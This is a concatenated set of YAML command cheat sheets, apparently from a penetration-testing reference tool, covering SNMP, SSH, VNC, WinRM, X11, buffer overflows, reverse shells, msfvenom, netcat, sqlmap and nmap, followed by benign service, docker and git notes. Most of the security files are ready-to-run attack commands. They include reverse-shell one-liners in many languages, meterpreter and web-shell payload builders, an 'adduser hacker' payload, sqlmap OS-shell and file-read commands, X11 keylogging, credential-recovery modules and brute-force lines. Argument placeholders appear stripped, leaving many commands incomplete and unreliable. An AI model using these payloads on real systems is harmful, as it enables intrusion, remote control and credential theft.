-sC -sV 11 | ``` 12 | 13 | nmap, snmp brute 14 | cat/ATTACK/BRUTEFORCE-SPRAY 15 | ``` 16 | nmap -sU --open -p 161 --script=snmp-brute --script-args snmp-brute.communitiesdb= 17 | ``` 18 | 19 | onesixtyone 20 | cat/RECON 21 | ``` 22 | echo public > community; echo private >> community; echo manager >> community; onesixtyone -c community -i ips; rm community 23 | ``` 24 | 25 | snmpwalk entire tree 26 | cat/RECON 27 | ``` 28 | snmpwalk -c public -v1 29 | ``` 30 | 31 | -------------------------------------------------------------------------------- /files/Protocol/ssh.yaml: -------------------------------------------------------------------------------- 1 | name: ssh 2 | tags: [ssh, 22] 3 | data: | 4 | plateform/linux #target/remote #protocol/ssh #port/22 5 | 6 | Start ssh agent 7 | target/local #cat/UTILS 8 | ``` 9 | eval "$(ssh-agent -s)"; ssh-add 10 | ``` 11 | 12 | SSH local port forwarding (get remote_port on local) 13 | cat/PIVOT/TUNNEL-PORTFW 14 | ``` 15 | ssh -L :: @ 16 | ``` 17 | 18 | SSH remote port forwarding (send local port to remote) (need GatewayPorts yes) 19 | cat/PIVOT/TUNNEL-PORTFW 20 | ``` 21 | ssh -R ::: @ 22 | ``` 23 | 24 | SSH proxysocks 25 | cat/PIVOT/TUNNEL-PORTFW 26 | ``` 27 | ssh -D @ 28 | ``` 29 | 30 | get public ssh key of server 31 | cat/UTILS 32 | ``` 33 | ssh-keyscan -t rsa -p 34 | ``` 35 | 36 | msf - bruteforce username 37 | cat/ATTACK/BRUTEFORCE-SPRAY 38 | ``` 39 | msfconsole -x "use scanner/ssh/ssh_enumusers; set RHOSTS ; set USER_FILE ; set CHECK_FALSE true; exploit" 40 | ``` 41 | 42 | SSH - old algorithm 43 | cat/UTILS 44 | ``` 45 | ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 @ 46 | ``` 47 | -------------------------------------------------------------------------------- /files/Protocol/telnet.yaml: -------------------------------------------------------------------------------- 1 | name: telnet 2 | tags: [telnet, 23] 3 | data: | 4 | plateform/linux #target/remote #protocol/telnet #port/23 5 | 6 | nmap - telnet 7 | cat/RECON 8 | ``` 9 | nmap -n -sV -Pn --script "*telnet* and safe" -p 23 10 | ``` -------------------------------------------------------------------------------- /files/Protocol/vnc.yaml: -------------------------------------------------------------------------------- 1 | name: VNC 2 | tags: [vnc, 5800, 5801, 5900, 5901] 3 | data: | 4 | plateform/linux #target/remote #protocol/vnc #port/5800 #port/5801 #port/5900 #port/5901 5 | 6 | vnc - nmap enum 7 | cat/RECON 8 | ``` 9 | nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p 10 | ``` 11 | 12 | vncviewer - connect to vnc no pass 13 | cat/ATTACK/CONNECT 14 | ``` 15 | vncviewer :: 16 | ``` 17 | 18 | vncviewer - connect to vnc with password 19 | cat/ATTACK/CONNECT 20 | ``` 21 | vncviewer -password :: 22 | ``` 23 | 24 | vnc msf test none auth 25 | cat/ATTACK/CONNECT 26 | ``` 27 | msfconsole -x "use auxiliary/scanner/vnc/vnc_none_auth; set RHOSTS ; set RPORT ; run" 28 | ``` 29 | 30 | vnc - msf test login bf 31 | cat/ATTACK/BRUTEFORCE-SPRAY 32 | ``` 33 | msfconsole -x "use auxiliary/scanner/vnc/vnc_login; set RHOSTS ; set RPORT ; set USERNAME ; run" 34 | ``` 35 | 36 | vnc - msf test login bf (2) 37 | cat/ATTACK/BRUTEFORCE-SPRAY 38 | ``` 39 | msfconsole -x "use auxiliary/scanner/vnc/vnc_login; set RHOSTS ; set RPORT ; set USER_FILE ; set PASS_FILE ; run" 40 | ``` 41 | 42 | vnc - post exploit retreive credentials 43 | cat/POSTEXPLOIT/CREDS_RECOVER 44 | ``` 45 | msfconsole -x "use post/windows/gather/credentials/vnc; set SESSION ; run" 46 | ``` 47 | -------------------------------------------------------------------------------- /files/Protocol/winrm.yaml: -------------------------------------------------------------------------------- 1 | name: winrm 2 | tags: [windows, remote, winrm, evilwinrm, 5985, 5986] 3 | data: | 4 | plateform/linux #target/remote #protocol/winrm #port/5985 #port/5986 5 | 6 | Enable winrm (powershell) 7 | plateform/windows #target/local #cat/UTILS 8 | ```powershell 9 | Enable-PSRemoting -Force 10 | Set-Item wsman:\localhost\client\trustedhosts * 11 | ``` 12 | 13 | Enable winrm (wmic) 14 | plateform/windows #target/local #cat/UTILS 15 | ```batchfile 16 | wmic /node: process call create "powershell enable-psremoting -force" 17 | ``` 18 | 19 | Test target is configure to use winrm (powershell) 20 | plateform/windows #target/local #cat/RECON 21 | ```powershell 22 | Test-WSMan -computername 23 | ``` 24 | 25 | Execute a command on the target over winrm (powershell) 26 | plateform/windows #target/remote #cat/ATTACK/EXPLOIT 27 | ```powershell 28 | Invoke-Command -computername -ScriptBlock {} -credential \ 29 | ``` 30 | 31 | Execute a script on the target over winrm (powershell) 32 | plateform/windows #target/remote #cat/ATTACK/EXPLOIT 33 | ```powershell 34 | Invoke-Command -ComputerName -FilePath -credential \ 35 | ``` 36 | 37 | Get a powershell session with winrm (powershell) 38 | plateform/windows #target/remote #cat/ATTACK/EXPLOIT 39 | ```powershell 40 | Enter-PSSession -ComputerName -Credential \ 41 | ``` 42 | 43 | Enable winrm remotelly from psexec 44 | plateform/windows #target/remote #cat/ATTACK/EXPLOIT 45 | ```batchfile 46 | .\PsExec.exe \\ -u \ -p -h -d powershell.exe "enable-psremoting -force" 47 | ``` 48 | 49 | evil-winrm install 50 | target/local #cat/UTILS 51 | ``` 52 | gem install evil-winrm 53 | ``` 54 | 55 | evil-winrm use 56 | plateform/linux #target/remote #cat/ATTACK/CONNECT 57 | ``` 58 | evil-winrm -i / -u -p 59 | ``` 60 | 61 | evil-winrm use pass the hash 62 | plateform/linux #target/remote #cat/ATTACK/CONNECT 63 | ``` 64 | evil-winrm -i / -u -H 65 | ``` -------------------------------------------------------------------------------- /files/Protocol/x11.yaml: -------------------------------------------------------------------------------- 1 | name: X11 2 | tags: [x11, 6000] 3 | data: | 4 | plateform/linux #target/remote #protocol/x11 #port/6000 5 | 6 | # x11 - check anonymous connection 7 | cat/ATTACK/CONNECT 8 | ``` 9 | nmap -sV --script x11-access -p 10 | ``` 11 | 12 | x11 - verify connection 13 | cat/RECON 14 | ``` 15 | xdpyinfo -display : 16 | ``` 17 | 18 | x11 - verify connection (2) 19 | cat/RECON 20 | ``` 21 | xwininfo -root -tree -display : 22 | ``` 23 | 24 | X11 - screenshot 25 | cat/ATTACK/EXPLOIT 26 | ``` 27 | xwd –root –screen –silent –display : > screenshot.xwd; convert screenshot.xwd screenshot.png 28 | ``` 29 | 30 | X11 - keylogging 31 | cat/ATTACK/EXPLOIT 32 | ``` 33 | xspy 34 | ``` 35 | 36 | X11 - remote desktop view 37 | cat/ATTACK/CONNECT 38 | ``` 39 | xrdp : 40 | ``` 41 | 42 | X11 - msf reverse shell 43 | cat/ATTACK/EXPLOIT 44 | ``` 45 | msfconsole -x "use exploit/unix/x11/x11_keyboard_exec; set RHOSTS ; set payload cmd/unix/reverse_bash; set lhost ; set lport ; exploit" 46 | ``` 47 | 48 | = display: 0 49 | -------------------------------------------------------------------------------- /files/Pwn/bof.yaml: -------------------------------------------------------------------------------- 1 | name: bof 2 | tags: [bof, buffer overflow] 3 | data: | 4 | plateform/linux #target/local #cat/PWN 5 | 6 | bof, pattern creation 7 | ``` 8 | msf-pattern_create -l 9 | ``` 10 | 11 | bof, pattern offset 12 | ``` 13 | msf-pattern_offset -l -q 14 | ``` 15 | 16 | bof, nasm - show opcode from asm 17 | ``` 18 | msf-nasm_shell  nasm > jmp esp 19 | ``` 20 | 21 | % bof, ropgadget 22 | 23 | ropgadget - Specify a binary filename to analyze 24 | ``` 25 | ROPgadget --binary 26 | ``` 27 | 28 | ropgagdet - Enable the ROP chain generation 29 | ``` 30 | ROPgadget --binary --ropchain 31 | ``` 32 | 33 | ropgagdet - Search opcode in executable segment 34 | ``` 35 | ROPgadget --binary --opcode 36 | ``` 37 | 38 | ropgadget - Search string between two addresses (0x...-0x...) 39 | ``` 40 | ROPgadget --binary --string --range - 41 | ``` 42 | 43 | # ropgadget - Only show specific instructions 44 | ``` 45 | ROPgadget --binary --only="" 46 | ``` 47 | 48 | # ropgadget - Suppress specific mnemonics 49 | ``` 50 | ROPgadget --binary --filter="" 51 | ``` 52 | 53 | % bof, mona 54 | 55 | mona - Show all loaded modules and their properties 56 | ``` 57 | !mona modules 58 | ``` 59 | 60 | mona - Configure the log directory (no need to create it) 61 | ``` 62 | !mona config -set workingfolder 63 | ``` 64 | 65 | mona - Verify the current the log directory 66 | ``` 67 | !mona config -get workingfolder 68 | ``` 69 | 70 | mona - Create a cyclic pattern of a given size 71 | ``` 72 | !mona pc 73 | ``` 74 | 75 | mona - Find cyclic pattern in memory 76 | ``` 77 | !mona findmsp 78 | ``` 79 | 80 | mona - Find location (offset) of 4 bytes in a cyclic pattern 81 | ``` 82 | !mona po 83 | ``` 84 | 85 | mona - Find bytes in memory (ex: eggs) 86 | ``` 87 | !mona find -s 88 | ``` 89 | 90 | mona - Find pointers that will allow you to jump to a register (without null bytes) 91 | ``` 92 | !mona jmp -r -n 93 | ``` 94 | 95 | mona - Find a function in IAT 96 | ``` 97 | !mona getiat -s 98 | ``` 99 | 100 | mona - Show the current SEH chain 101 | ``` 102 | !mona sehchain 103 | ``` 104 | 105 | mona - Set a breakpoint on all current SEH Handler function pointers 106 | ``` 107 | !mona bpseh 108 | ``` 109 | 110 | mona - Find pointers to assist with SEH overwrite exploits (default: no aslr, no rebase, no safeseh) 111 | ``` 112 | !mona seh 113 | ``` 114 | 115 | mona - Badchar hunting step 1 - Creates a byte array 116 | ``` 117 | !mona bytearray -cpb 118 | ``` 119 | 120 | mona - Badchar hunting step 3 - compare until "!!! Hooray, normal shellcode unmodified !!!" message 121 | ``` 122 | !mona compare -f -a 123 | ``` 124 | 125 | mona - Finds gadgets that can be used in a ROP exploit and do ROP magic with them (Note : can take 20 minutes) 126 | ``` 127 | !mona rop -cm aslr=false,rebase=false 128 | ``` 129 | 130 | mona - Finds stackpivots (move stackpointer to controlled area) 131 | ``` 132 | !mona stackpivot -cm os=true -distance 133 | ``` 134 | 135 | mona - Show pointers to pointers to the pattern (might take a while !) 136 | ``` 137 | !mona find -type file -s -p2p 138 | ``` 139 | -------------------------------------------------------------------------------- /files/Race Condition/racecondition.yaml: -------------------------------------------------------------------------------- 1 | name: race condition 2 | tags: [toctou, race condition] 3 | data: | 4 | plateform/linux #target/local #cat/PRIVESC 5 | 6 | change a file by a symlink when found 7 | ```bash 8 | while true ; do N= ; if [[ -r $N ]] ; then rm $N ; ln -s $N ; break; fi ; done 9 | ``` 10 | -------------------------------------------------------------------------------- /files/ReverseShell/msfvenom.yaml: -------------------------------------------------------------------------------- 1 | name: msfvenom 2 | tags: [msfvenom, reverse shell] 3 | data: | 4 | 5 | plateform/linux #target/local #cat/ATTACK/REVERSE_SHELL 6 | 7 | msfvenom payloads list 8 | ``` 9 | msfvenom --list payloads 10 | ``` 11 | 12 | msfvenom - payload windows x86 meterpeter unstagged 13 | ``` 14 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe 15 | ``` 16 | 17 | Linux Meterpreter Reverse Shell 18 | ``` 19 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf 20 | ``` 21 | 22 | Windows Meterpreter Reverse TCP Shell 23 | ``` 24 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe 25 | ``` 26 | 27 | Windows Reverse TCP Shell 28 | ``` 29 | msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > shell.exe 30 | ``` 31 | 32 | Windows Encoded Meterpreter Windows Reverse Shell 33 | ``` 34 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -e shikata_ga_nai -i 3 -f exe > encoded.exe 35 | ``` 36 | 37 | Mac Reverse Shell 38 | ``` 39 | msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho 40 | ``` 41 | 42 | Web Payloads 43 | 44 | # PHP Meterpreter Reverse TCP 45 | ``` 46 | msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php 47 | ``` 48 | 49 | ASP Meterpreter Reverse TCP 50 | ``` 51 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp 52 | ``` 53 | 54 | JSP Java Meterpreter Reverse TCP 55 | ``` 56 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp 57 | ``` 58 | 59 | WAR 60 | ``` 61 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war 62 | ``` 63 | 64 | Scripting Payloads 65 | 66 | # Python Reverse Shell 67 | ``` 68 | msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py 69 | ``` 70 | 71 | Bash Unix Reverse Shell 72 | ``` 73 | msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh 74 | ``` 75 | 76 | Perl Unix Reverse shell 77 | ``` 78 | msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl 79 | ``` 80 | 81 | msfvenom Shellcode 82 | 83 | Windows Meterpreter Reverse TCP Shellcode 84 | ``` 85 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f 86 | ``` 87 | 88 | Linux Meterpreter Reverse TCP Shellcode 89 | ``` 90 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f 91 | ``` 92 | 93 | Mac Reverse TCP Shellcode 94 | ``` 95 | msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f 96 | ``` 97 | 98 | MCreate User 99 | ``` 100 | msfvenom -p windows/adduser USER=hacker PASS='Hacker123$' -f exe > adduser.exe 101 | ``` 102 | 103 | Metasploit Handler 104 | ``` 105 | msfconsole -x "use exploits/multi/handler; set lhost ; set lport ; set payload windows/meterpreter/reverse_tcp; exploit" 106 | ``` 107 | -------------------------------------------------------------------------------- /files/ReverseShell/nc.yaml: -------------------------------------------------------------------------------- 1 | name: netcat 2 | tags: [nc, netcat] 3 | data: | 4 | 5 | plateform/linux #target/remote #cat/ATTACK/LISTEN-SERVE 6 | nc setup listener 7 | ``` 8 | nc -nlvp 9 | ``` 10 | 11 | nc bind shell windows 12 | plateform/windows 13 | ``` 14 | nc -nlvp -e cmd.exe 15 | ``` 16 | 17 | nc bind shell linux 18 | plateform/linux 19 | ``` 20 | nc -nlvp -e /bin/bash 21 | ``` 22 | 23 | nc reverse shell windows 24 | plateform/windows #cat/ATTACK/REVERSE_SHELL 25 | ``` 26 | nc -nv -e cmd.exe 27 | ``` 28 | 29 | nc reverse shell linux 30 | plateform/linux #cat/ATTACK/REVERSE_SHELL 31 | ``` 32 | nc -nv -e /bin/bash 33 | ``` 34 | 35 | nc transfert file - receiver 36 | plateform/linux #cat/ATTACK/FILE_TRANSFERT 37 | ``` 38 | nc -nlvp > 39 | ``` 40 | 41 | nc transfert file - sender 42 | plateform/linux #cat/ATTACK/FILE_TRANSFERT 43 | ``` 44 | nc -nv < 45 | ``` 46 | 47 | ncat 48 | 49 | % ncat 50 | 51 | ncat bind shell ssl filtered 52 | plateform/linux #cat/ATTACK/LISTEN-SERVE 53 | ``` 54 | ncat --exec cmd.exe --allow -vnl --ssl 55 | ``` 56 | 57 | ncat bind shell ssl connection 58 | plateform/linux #cat/ATTACK/LISTEN-SERVE 59 | ``` 60 | ncat -v --ssl 61 | ``` 62 | 63 | ncat HTTP WEB proxy 64 | plateform/linux #cat/ATTACK/LISTEN-SERVE 65 | ``` 66 | ncat --listen --proxy-type http 67 | ``` 68 | 69 | -------------------------------------------------------------------------------- /files/ReverseShell/reverse_shell.yaml: -------------------------------------------------------------------------------- 1 | name: reverse shell 2 | tags: [reverseshell, reverse] 3 | data: | 4 | plateform/linux #target/local #cat/ATTACK/REVERSE_SHELL 5 | 6 | bash reverse shell 7 | ``` 8 | bash -i >& /dev/tcp// 0>&1 9 | ``` 10 | 11 | perl reverse shell 12 | ``` 13 | perl -e 'use Socket;$i="";$p=;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 14 | ``` 15 | 16 | python reverse shell 17 | ``` 18 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 19 | ``` 20 | 21 | php reverse shell 22 | ``` 23 | php -r '$sock=fsockopen("",);exec("/bin/sh -i <&3 >&3 2>&3");' 24 | ``` 25 | 26 | ruby reverse shell 27 | ``` 28 | ruby -rsocket -e'f=TCPSocket.open("",).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' 29 | ``` 30 | 31 | [[java]] reverse shell 32 | ```java 33 | r = Runtime.getRuntime();p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp//;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]);p.waitFor() 34 | ``` 35 | 36 | [[Arsenal/Windows/powershell]] reverse shell 37 | ```powershell 38 | $client = New-Object System.Net.Sockets.TCPClient('',);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() 39 | ``` 40 | 41 | windows listener autocompletion 42 | ``` 43 | rlwramp nc -nlvp 44 | ``` 45 | 46 | interactive reverse shell - and Ctrl+Z (1) 47 | ``` 48 | python -c 'import pty; pty.spawn("/bin/bash")' 49 | ``` 50 | 51 | interactive reverse shell - on host - and do fg (2) 52 | ``` 53 | stty raw -echo 54 | ``` 55 | 56 | interactive reverse shell - on reverse (3) 57 | ``` 58 | reset 59 | stty rows cols 60 | export TERM=xterm-256color 61 | ``` 62 | -------------------------------------------------------------------------------- /files/SQL Injection/sqlmap.yaml: -------------------------------------------------------------------------------- 1 | name: SQLMAP 2 | tags: [sql injection] 3 | data: | 4 | plateform/linux #target/remote #cat/ATTACK/INJECTION #port/80 #port/443 #port/8080 #port/8443 5 | 6 | basic sqlmap step 1 7 | ``` 8 | sqlmap -u -p --dbs 9 | ``` 10 | 11 | basic sqlmap step 2 12 | ``` 13 | sqlmap -u -p --dbms= 14 | ``` 15 | 16 | basic sqlmap step 3 17 | ``` 18 | sqlmap -u -p --dbms= -D --tables 19 | ``` 20 | 21 | basic sqlmap step 4 22 | ``` 23 | sqlmap -u -p --dbms= -D -T --columns 24 | ``` 25 | 26 | basic sqlmap step 5 27 | ``` 28 | sqlmap -u -p --dbms= -D -T -C --dump 29 | ``` 30 | 31 | sqlmap - list dbs 32 | ``` 33 | sqlmap -u --dbs 34 | ``` 35 | 36 | sqlmap - list tables 37 | ``` 38 | sqlmap -u -D --tables 39 | ``` 40 | 41 | sqlmap - dump a table 42 | ``` 43 | sqlmap -u -D -T --dump 44 | ``` 45 | 46 | sqlmap - list columns of a table 47 | ``` 48 | sqlmap -u -D -T
--columns 49 | ``` 50 | 51 | sqlmap - dump only some tables columns 52 | ``` 53 | sqlmap -u -D -T
-C , --dump 54 | ``` 55 | 56 | # sqlmap - get shell 57 | ``` 58 | sqlmap -u --os-shell 59 | ``` 60 | 61 | # sqlmap - file read 62 | ``` 63 | sqlmap -u --file-read= 64 | ``` 65 | 66 | # sqlmap - file write 67 | ``` 68 | sqlmap -u --file-write= --file-dest= 69 | ``` 70 | 71 | sqlmap - classic get 72 | ``` 73 | sqlmap -u 74 | ``` 75 | 76 | sqlmap - classic post 77 | ``` 78 | sqlmap -u -d "" 79 | ``` 80 | 81 | # sqlmap - get with cookie 82 | ``` 83 | sqlmap -u --cookie= 84 | ``` 85 | 86 | sqlmap - use file 87 | ``` 88 | sqlmap -r 89 | ``` 90 | 91 | # sqlmap - classic with tamper 92 | ``` 93 | sqlmap -u '' tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes 94 | ``` 95 | 96 | sqlmap - hardcore 97 | ``` 98 | sqlmap -u '' --level=5 --risk=3 -p '' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords 99 | ``` 100 | 101 | sqlmap - mysql tamper list 102 | ``` 103 | sqlmap -u --dbms=MYSQL tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes 104 | ``` 105 | 106 | sqlmap - mssql tamper list 107 | ``` 108 | sqlmap -u --dbms=MSSQL tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor 109 | ``` 110 | -------------------------------------------------------------------------------- /files/Scan/nmap.yaml: -------------------------------------------------------------------------------- 1 | name: nmap 2 | tags: [nmap] 3 | data: | 4 | 5 | nmap - hosts alive 6 | ``` 7 | nmap -sn 8 | ``` 9 | 10 | nmap - classic scan 11 | ``` 12 | nmap -sC -sV 13 | ``` 14 | 15 | nmap - read targets from a file 16 | ``` 17 | nmap -iL 18 | ``` 19 | 20 | nmap - classic scan + save 21 | ``` 22 | nmap -sC -sV -oA 23 | ``` 24 | 25 | nmap - quick scan top ports 100 26 | ``` 27 | nmap --top-ports 100 --open -sV 28 | ``` 29 | 30 | nmap - big top ports 5000 31 | ``` 32 | nmap --top-ports 5000 --open -sV 33 | ``` 34 | 35 | nmap - full port 36 | ``` 37 | nmap -p- -sV 38 | ``` 39 | 40 | nmap - host with a given port 41 | ``` 42 | nmap -p --open 43 | ``` 44 | 45 | nmap - FULL 46 | ``` 47 | IP=; 48 | ports=$(nmap -p- --min-rate=1000 -n -T4 $IP | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//); 49 | nmap -Pn -sC -sV -p$ports $IP -oN scan.txt --reason --script=vuln 50 | ``` 51 | 52 | nmap - udp scan 53 | ``` 54 | nmap -sU 55 | ``` 56 | 57 | nmap - low rate Classic 58 | ``` 59 | nmap --max-rate 100 -sC -sV 60 | ``` 61 | 62 | massscan - full port 63 | ``` 64 | masscan -p 1-65535 -e --rate=1000 65 | ``` 66 | 67 | nmap - SMB signing disabled 68 | ``` 69 | nmap -Pn -sS -T4 --open --script smb-security-mode -p445 70 | ``` 71 | 72 | nmap behind proxy - tcp connect (-sT) - no dns (-n) 73 | ``` 74 | proxychains nmap -n -sT -sV -Pn --open -oA -iL 75 | ``` 76 | -------------------------------------------------------------------------------- /files/Services/service.yaml: -------------------------------------------------------------------------------- 1 | name: Service 2 | tags: [service] 3 | data: | 4 | 5 | List services 6 | ``` 7 | service --status-all 8 | ``` 9 | 10 | Status of a service 11 | ``` 12 | service status 13 | ``` 14 | 15 | Start a service 16 | ``` 17 | service start 18 | ``` 19 | 20 | Stop a service 21 | ``` 22 | service stop 23 | ``` 24 | 25 | Restart a service 26 | ``` 27 | service restart 28 | ``` 29 | -------------------------------------------------------------------------------- /files/Services/systemctl.yaml: -------------------------------------------------------------------------------- 1 | name: systemctl 2 | tags: [systemctl, service] 3 | data: | 4 | plateform/linux #target/local #cat/UTILS 5 | 6 | Start service 7 | ``` 8 | systemctl start 9 | ``` 10 | 11 | Stop service 12 | ``` 13 | systemctl stop 14 | ``` 15 | 16 | Enable service 17 | ``` 18 | systemctl enable 19 | ``` 20 | 21 | Disable service 22 | ``` 23 | systemctl disable 24 | ``` 25 | 26 | Restart service 27 | ``` 28 | systemctl restart 29 | ``` 30 | 31 | Reload service 32 | ``` 33 | systemctl reload 34 | ``` 35 | 36 | Service status 37 | ``` 38 | systemctl status 39 | ``` 40 | 41 | List running services 42 | ``` 43 | systemctl list-units --type=service --state=running 44 | ``` 45 | 46 | List enabled services 47 | ``` 48 | systemctl list-unit-files --type=service --state=enabled 49 | ``` 50 | 51 | List disabled services 52 | ``` 53 | systemctl list-unit-files --type=service --state=disabled 54 | ``` 55 | 56 | $ service_inactive: systemctl list-units --type=service --state=inactive | awk '{print $1}' | grep .service | sed 's/.service$//' 57 | $ service_active: systemctl list-units --type=service --state=active | awk '{print $1}' | grep .service | sed 's/.service$//' 58 | $ service_enabled: systemctl list-unit-files --type=service --state=enabled | awk '{print $1}' | grep .service | sed 's/.service$//' 59 | $ service_disabled: systemctl list-unit-files --type=service --state=disabled | awk '{print $1}' | grep .service | sed 's/.service$//' 60 | $ service: systemctl list-units --type=service --all | awk '{print $1}' | grep .service | sed 's/.service$//' 61 | -------------------------------------------------------------------------------- /files/Tools/docker.yaml: -------------------------------------------------------------------------------- 1 | name: Docker 2 | tags: [docker, container] 3 | data: | 4 | 5 | plateform/multiple #target/local #cat/UTILS 6 | 7 | Remove an image 8 | docker image rm 9 | 10 | Delete an image from the local image store 11 | docker rmi 12 | 13 | List all images that are locally stored with the Docker engine 14 | docker images 15 | 16 | Build an image from the Dockerfile in the current directory and tag the image 17 | docker build -t : . 18 | 19 | Pull an image from a registry 20 | docker pull : 21 | 22 | Stop a running container through SIGTERM 23 | docker stop 24 | 25 | Stop a running container through SIGKILL 26 | docker kill 27 | 28 | List the networks 29 | docker network ls 30 | 31 | List the running containers 32 | docker ps 33 | 34 | Delete all running and stopped containers 35 | docker rm -f $(docker ps -aq) 36 | 37 | Create a new bash process inside the container and connect it to the terminal 38 | docker exec -it bash 39 | 40 | Print the last lines of a container’s logs 41 | docker logs --tail 100 | less 42 | 43 | Print the last lines of a container's logs and following its logs 44 | docker logs --tail 100 -f 45 | 46 | Create new network 47 | docker network create 48 | 49 | $ image_id: docker images --- --headers 1 --column 3 50 | $ container_id: docker ps --- --headers 1 --column 1 51 | 52 | 53 | 54 | % docker-compose 55 | 56 | Builds, (re)creates, starts, and attaches to containers for all services 57 | docker-compose up 58 | 59 | Builds, (re)creates, starts, and dettaches to containers for all services 60 | docker-compose up -d 61 | 62 | Builds, (re)creates, starts, and attaches to containers for a service 63 | docker-compose up -d 64 | 65 | Builds, (re)creates, starts, and dettaches to containers for a service 66 | docker-compose up -d 67 | 68 | Print the last lines of a service’s logs 69 | docker-compose logs --tail 100 | less 70 | 71 | Print the last lines of a service's logs and following its logs 72 | docker-compose logs -f --tail 100 73 | 74 | Stops containers and removes containers, networks created by up 75 | docker-compose down 76 | 77 | % docker, mysql 78 | run mysql container 79 | docker run --rm --name= -e MYSQL_ALLOW_EMPTY_PASSWORD=yes -d mysql/mysql-server: 80 | 81 | connect to mysql docker container 82 | docker exec -ti mysql 83 | -------------------------------------------------------------------------------- /files/Tools/git.yaml: -------------------------------------------------------------------------------- 1 | name: git 2 | tags: [git] 3 | data: | 4 | 5 | Set global git user name 6 | ``` 7 | git config --global user.name 8 | ``` 9 | 10 | Set global git user email 11 | ``` 12 | git config --global user.email 13 | ``` 14 | 15 | Initializes a git repository 16 | ``` 17 | git init 18 | ``` 19 | 20 | Clone a git repository 21 | ``` 22 | git clone -b 23 | ``` 24 | 25 | View all available remote for a git repository 26 | ``` 27 | git remote --verbose 28 | ``` 29 | 30 | Adds a remote for a git repository 31 | ``` 32 | git remote add 33 | ``` 34 | 35 | Renames a remote for a git repository 36 | ``` 37 | git remote rename 38 | ``` 39 | 40 | Remove a remote for a git repository 41 | ``` 42 | git remote remove 43 | ``` 44 | 45 | Checkout to branch 46 | ``` 47 | git checkout 48 | ``` 49 | 50 | Displays the current status of a git repository 51 | ``` 52 | git status 53 | ``` 54 | 55 | Displays unstaged changes for file 56 | ``` 57 | git diff 58 | ``` 59 | 60 | Stage single or multiple files 61 | ``` 62 | git add ; 63 | ``` 64 | 65 | Stage all files in project 66 | ``` 67 | git add -A 68 | ``` 69 | 70 | Saves the changes to a file in a commit 71 | ``` 72 | git commit -m 73 | ``` 74 | 75 | Pushes committed changes to remote repository 76 | ``` 77 | git push -u 78 | ``` 79 | 80 | Pushes changes to a remote repository overwriting another branch 81 | ``` 82 | git push : 83 | ``` 84 | 85 | Overwrites remote branch with local branch changes 86 | ``` 87 | git push -f 88 | ``` 89 | 90 | Pulls changes to a remote repo to the local repo 91 | ``` 92 | git pull --ff-only 93 | ``` 94 | 95 | Merges changes on one branch into current branch 96 | ``` 97 | git merge 98 | ``` 99 | 100 | Abort the current conflict resolution process, and try to reconstruct the pre-merge state. 101 | ``` 102 | 